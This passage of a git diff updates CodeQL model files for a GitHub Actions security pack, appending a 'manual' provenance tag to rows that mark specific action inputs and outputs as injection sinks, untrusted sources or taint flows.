a/ql/lib/ext/dawidd6_action-download-artifact.model.yml +++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["dawidd6/action-download-artifact", "*", "output.artifacts", "Artifact details"] + - ["dawidd6/action-download-artifact", "*", "output.artifacts", "Artifact details", "manual"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml index 82f491390d2..1647e560730 100644 --- a/ql/lib/ext/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"] \ No newline at end of file + - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml index 430a96f6cbe..bbdad8287dd 100644 --- a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml +++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection"] - - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection"] - - ["determinatesystems/magic-nix-cache-action", "*", "input.source-pr", "command-injection"] - - ["determinatesystems/magic-nix-cache-action", "*", "input.source-branch", "command-injection"] - - ["determinatesystems/magic-nix-cache-action", "*", "input.source-revision", "command-injection"] - - ["determinatesystems/magic-nix-cache-action", "*", "input.source-binary", "command-injection"] \ No newline at end of file + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection", "manual"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection", "manual"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-pr", "command-injection", "manual"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-branch", "command-injection", "manual"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-revision", "command-injection", "manual"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-binary", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml index 37bcf2cc781..f3ac66006d9 100644 --- a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml +++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection"] - - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection"] - - ["docker-practice/actions-setup-docker", "*", "input.docker_daemon_json", "command-injection"] + - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection", "manual"] + - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection", "manual"] + - ["docker-practice/actions-setup-docker", "*", "input.docker_daemon_json", "command-injection", "manual"] diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml index 77eaf3ae10f..9189245e228 100644 --- a/ql/lib/ext/docker_build-push-action.model.yml +++ b/ql/lib/ext/docker_build-push-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["docker/build-push-action", "*", "input.context", "code-injection"] \ No newline at end of file + - ["docker/build-push-action", "*", "input.context", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml index 41a9c337f49..14743f2819e 100644 --- a/ql/lib/ext/dorny_paths-filter.model.yml +++ b/ql/lib/ext/dorny_paths-filter.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["dorny/paths-filter", "*", "output.changes", "PR changed files"] + - ["dorny/paths-filter", "*", "output.changes", "PR changed files", "manual"] diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml index 63cdb2a496b..bd64fc37423 100644 --- a/ql/lib/ext/endbug_latest-tag.model.yml +++ b/ql/lib/ext/endbug_latest-tag.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["endbug/latest-tag", "*", "input.ref", "command-injection"] - - ["endbug/latest-tag", "*", "input.tag-name", "command-injection"] - - ["endbug/latest-tag", "*", "input.git-directory", "command-injection"] - - ["endbug/latest-tag", "*", "input.description", "command-injection"] + - ["endbug/latest-tag", "*", "input.ref", "command-injection", "manual"] + - ["endbug/latest-tag", "*", "input.tag-name", "command-injection", "manual"] + - ["endbug/latest-tag", "*", "input.git-directory", "command-injection", "manual"] + - ["endbug/latest-tag", "*", "input.description", "command-injection", "manual"] diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml index d0bcbb4da98..9a20279e110 100644 --- a/ql/lib/ext/expo_expo-github-action.model.yml +++ b/ql/lib/ext/expo_expo-github-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["expo/expo-github-action", "*", "input.command", "command-injection"] - - ["expo/expo-github-action", "*", "input.packager", "command-injection"] + - ["expo/expo-github-action", "*", "input.command", "command-injection", "manual"] + - ["expo/expo-github-action", "*", "input.packager", "command-injection", "manual"] diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml index 6418e71f22a..8d06bc8a512 100644 --- a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml +++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection"] + - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index 760b7cd46e7..9d066ac23ec 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint"] - - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint"] + - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint", "manual"] + - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint", "manual"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml index b6c75a06e57..ecfce617df4 100644 --- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "PR body"] - - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "PR title"] + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "PR body", "manual"] + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "PR title", "manual"] diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml index 86705319e23..563da9d4c0f 100644 --- a/ql/lib/ext/gabrielbb_xvfb-action.model.yml +++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection"] - - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection"] \ No newline at end of file + - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection", "manual"] + - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml index 61fdcd9254a..5194ce500fb 100644 --- a/ql/lib/ext/game-ci_unity-builder.model.yml +++ b/ql/lib/ext/game-ci_unity-builder.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection"] - - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection"] + - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection", "manual"] + - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection", "manual"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml index 2d142d98099..8c2f32627d9 100644 --- a/ql/lib/ext/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"] \ No newline at end of file + - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml index 1727ca60e25..f74ae81a52c 100644 --- a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml +++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection"] \ No newline at end of file + - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml index e6688f3805d..c7e2cf41b3f 100644 --- a/ql/lib/ext/getsentry_action-release.model.yml +++ b/ql/lib/ext/getsentry_action-release.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["getsentry/action-release", "*", "input.version", "output.version", "taint"] - - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint"] + - ["getsentry/action-release", "*", "input.version", "output.version", "taint", "manual"] + - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml index b214178350c..781384a2fe1 100644 --- a/ql/lib/ext/github_codeql-action.model.yml +++ b/ql/lib/ext/github_codeql-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint"] + - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint", "manual"] diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml index 146f4a17a55..9036f199f42 100644 --- a/ql/lib/ext/go-semantic-release_action.model.yml +++ b/ql/lib/ext/go-semantic-release_action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["go-semantic-release/action", "*", "input.bin", "command-injection"] + - ["go-semantic-release/action", "*", "input.bin", "command-injection", "manual"] diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml index 8c0f7a5ad61..7eee95dbcce 100644 --- a/ql/lib/ext/golangci_golangci-lint-action.model.yml +++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["golangci/golangci-lint-action", "*", "input.version", "command-injection"] + - ["golangci/golangci-lint-action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml index 9c7c03b9f35..4fe9e32ce52 100644 --- a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml +++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection"] - - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection"] + - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection", "manual"] + - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection", "manual"] diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml index 9d9eac38af0..0352ece87b5 100644 --- a/ql/lib/ext/goreleaser_goreleaser-action.model.yml +++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection"] + - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml index 4c74301d1c3..712f2ce3395 100644 --- a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml +++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection"] - - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection"] - - ["gr2m/create-or-update-pull-request-action", "*", "input.commit-message", "command-injection"] - - ["gr2m/create-or-update-pull-request-action", "*", "input.author", "command-injection"] \ No newline at end of file + - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection", "manual"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection", "manual"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.commit-message", "command-injection", "manual"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.author", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml index 0534d299627..45c00c1c30e 100644 --- a/ql/lib/ext/gradle_gradle-build-action.model.yml +++ b/ql/lib/ext/gradle_gradle-build-action.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint"] - - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint"] - - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-url", "env.BUILD_SCAN_TERMS_OF_SERVICE_URL", "taint"] + - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint", "manual"] + - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint", "manual"] + - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-url", "env.BUILD_SCAN_TERMS_OF_SERVICE_URL", "taint", "manual"] diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml index a8a528b85c5..8f05918155e 100644 --- a/ql/lib/ext/haya14busa_action-cond.model.yml +++ b/ql/lib/ext/haya14busa_action-cond.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint"] - - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint"] + - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint", "manual"] + - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml index 6a907fcc3a1..708c310c05f 100644 --- a/ql/lib/ext/hexlet_project-action.model.yml +++ b/ql/lib/ext/hexlet_project-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint"] + - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint", "manual"] diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml index 6332cbfdad8..76177635899 100644 --- a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml +++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection"] - - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection"] - - ["ilammy/msvc-dev-cmd", "*", "input.sdk", "command-injection"] - - ["ilammy/msvc-dev-cmd", "*", "input.toolset", "command-injection"] \ No newline at end of file + - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection", "manual"] + - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection", "manual"] + - ["ilammy/msvc-dev-cmd", "*", "input.sdk", "command-injection", "manual"] + - ["ilammy/msvc-dev-cmd", "*", "input.toolset", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml index f8b8490c213..7106115c17a 100644 --- a/ql/lib/ext/ilammy_setup-nasm.model.yml +++ b/ql/lib/ext/ilammy_setup-nasm.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ilammy/setup-nasm", "*", "input.version", "command-injection"] - - ["ilammy/setup-nasm", "*", "input.destination", "command-injection"] + - ["ilammy/setup-nasm", "*", "input.version", "command-injection", "manual"] + - ["ilammy/setup-nasm", "*", "input.destination", "command-injection", "manual"] diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml index 64024ef5c72..366e5dd1766 100644 --- a/ql/lib/ext/imjohnbo_issue-bot.model.yml +++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["imjohnbo/issue-bot", "*", "input.body", "code-injection"] - - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection"] - - ["imjohnbo/issue-bot", "*", "input.linked-comments-new-issue-text", "code-injection"] \ No newline at end of file + - ["imjohnbo/issue-bot", "*", "input.body", "code-injection", "manual"] + - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection", "manual"] + - ["imjohnbo/issue-bot", "*", "input.linked-comments-new-issue-text", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml index 1771ac2bad0..a469063fc50 100644 --- a/ql/lib/ext/iterative_setup-cml.model.yml +++ b/ql/lib/ext/iterative_setup-cml.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["iterative/setup-cml", "*", "input.version", "command-injection"] + - ["iterative/setup-cml", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml index e8600c6f7df..d0d5b57574b 100644 --- a/ql/lib/ext/iterative_setup-dvc.model.yml +++ b/ql/lib/ext/iterative_setup-dvc.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["iterative/setup-dvc", "*", "input.version", "command-injection"] + - ["iterative/setup-dvc", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml index 2ab70905db1..3151e335d22 100644 --- a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml +++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection"] - - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection"] - - ["jamesives/github-pages-deploy-action", "*", "input.git-config-email", "command-injection"] - - ["jamesives/github-pages-deploy-action", "*", "input.git-config-name", "command-injection"] - - ["jamesives/github-pages-deploy-action", "*", "input.target-folder", "command-injection"] - - ["jamesives/github-pages-deploy-action", "*", "input.tag", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection", "manual"] + - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection", "manual"] + - ["jamesives/github-pages-deploy-action", "*", "input.git-config-email", "command-injection", "manual"] + - ["jamesives/github-pages-deploy-action", "*", "input.git-config-name", "command-injection", "manual"] + - ["jamesives/github-pages-deploy-action", "*", "input.target-folder", "command-injection", "manual"] + - ["jamesives/github-pages-deploy-action", "*", "input.tag", "command-injection", "manual"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index 2e5b0d42efd..38253b68934 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["jitterbit/get-changed-files", "*", "output.all", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.added", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.modified", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.removed", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.renamed", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.added_modified", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.deleted", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.all", "PR changed files", "manual"] + - ["jitterbit/get-changed-files", "*", "output.added", "PR changed files", "manual"] + - ["jitterbit/get-changed-files", "*", "output.modified", "PR changed files", "manual"] + - ["jitterbit/get-changed-files", "*", "output.removed", "PR changed files", "manual"] + - ["jitterbit/get-changed-files", "*", "output.renamed", "PR changed files", "manual"] + - ["jitterbit/get-changed-files", "*", "output.added_modified", "PR changed files", "manual"] + - ["jitterbit/get-changed-files", "*", "output.deleted", "PR changed files", "manual"] diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml index 948be24b45c..0930fc246c3 100644 --- a/ql/lib/ext/johnnymorganz_stylua-action.model.yml +++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection"] + - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml index f1a04c9e244..5b344799ad9 100644 --- a/ql/lib/ext/jsdaniell_create-json.model.yml +++ b/ql/lib/ext/jsdaniell_create-json.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint"] - - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint"] - - ["jsdaniell/create-json", "*", "input.dir", "output.successfully", "taint"] + - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint", "manual"] + - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint", "manual"] + - ["jsdaniell/create-json", "*", "input.dir", "output.successfully", "taint", "manual"] diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml index 928c1f918d3..5b6f1342fc4 100644 --- a/ql/lib/ext/jurplel_install-qt-action.model.yml +++ b/ql/lib/ext/jurplel_install-qt-action.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jurplel/install-qt-action", "*", "input.version", "command-injection"] - - ["jurplel/install-qt-action", "*", "input.arch", "command-injection"] - - ["jurplel/install-qt-action", "*", "input.dir", "command-injection"] - - ["jurplel/install-qt-action", "*", "input.aqtversion", "command-injection"] - - ["jurplel/install-qt-action", "*", "input.py7zrversion", "command-injection"] - - ["jurplel/install-qt-action", "*", "input.extra", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.version", "command-injection", "manual"] + - ["jurplel/install-qt-action", "*", "input.arch", "command-injection", "manual"] + - ["jurplel/install-qt-action", "*", "input.dir", "command-injection", "manual"] + - ["jurplel/install-qt-action", "*", "input.aqtversion", "command-injection", "manual"] + - ["jurplel/install-qt-action", "*", "input.py7zrversion", "command-injection", "manual"] + - ["jurplel/install-qt-action", "*", "input.extra", "command-injection", "manual"] diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml index ad95f1f323a..b34833d85f3 100644 --- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"] + - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection"] - - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection"] - - ["jwalton/gh-ecr-push", "*", "input.region", "command-injection"] + - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection", "manual"] + - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection", "manual"] + - ["jwalton/gh-ecr-push", "*", "input.region", "command-injection", "manual"] diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml index 18339bfa4e9..bbfc0bed1df 100644 --- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml +++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body"] - - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body"] + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body", "manual"] + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body", "manual"] diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml index abfca93b4ec..74ef5820cb7 100644 --- a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml +++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint"] + - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml index b3cb5aa3940..e05a3afd63a 100644 --- a/ql/lib/ext/leafo_gh-actions-lua.model.yml +++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection"] - - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection"] + - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection", "manual"] + - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection", "manual"] diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml index a84880cfdf1..a96ad45d624 100644 --- a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml +++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection"] + - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection", "manual"] diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml index f32484a4f0d..a70e8facf7c 100644 --- 